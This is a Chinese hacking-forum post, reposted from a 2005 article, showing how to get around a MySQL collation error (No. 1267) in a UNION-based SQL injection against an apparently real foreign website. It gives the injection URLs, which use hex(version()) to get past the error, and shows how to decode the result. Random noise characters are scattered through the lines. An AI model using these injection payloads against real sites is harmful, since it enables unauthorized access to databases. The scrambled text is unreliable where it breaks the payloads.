找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MySQL注射时ErrorNo.1267的突破
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2108|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei
) C' {  S* e  T5 T文章性质:原创
, h, \/ s  Y( M6 i7 \) F7 m& S发布日期:2005-10-18
1 Y3 U# u0 D6 y) y测试个国外的站时:- U9 `; S* R8 A: Q7 H! g
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*0 H0 T- E+ d: k9 {  |7 R
返回错误:& c3 i/ b, P6 f
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'( `2 W% `+ Q- U/ c1 {5 d$ Z
MySQL Error No. 126  d0 Q6 M2 K1 J- I3 B4 U
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
" f5 d$ R+ J/ ?  l+ h. K解决办法:转为其他编码如hex。. R- M, w$ C+ w5 G, l' f
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
- Q' d1 Y, \' L0 d# d2 a: T成功得到hex(version())的值为:
* n" p- k! m6 M8 q342E312E332D62657461
8 Y; V; k. S3 ?9 }5 a: Q回Mysql查询下得到:
0 \! p" {3 V+ K- w& Jmysql> select 0x342E312E332D62657461;8 R4 a2 X# {6 z$ S7 y
+------------------------+
& v% M" N8 U. j( {, V5 b4 K) Q| 0x342E312E332D62657461 |6 k" |2 ?3 s9 O" B, g$ g9 a
+------------------------+* [) ]& P; d, ?( j5 v( q, I
| 4.1.3-beta |
0 i0 G; P: R" j* I- q9 Q$ E' R$ j3 j+------------------------+1 M5 B' r( g% r- V, k4 Z" Y
1 row in set (0.00 sec)/ l1 G  R( A/ H, r4 V
. x: t( q/ o* p8 g; D7 O
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表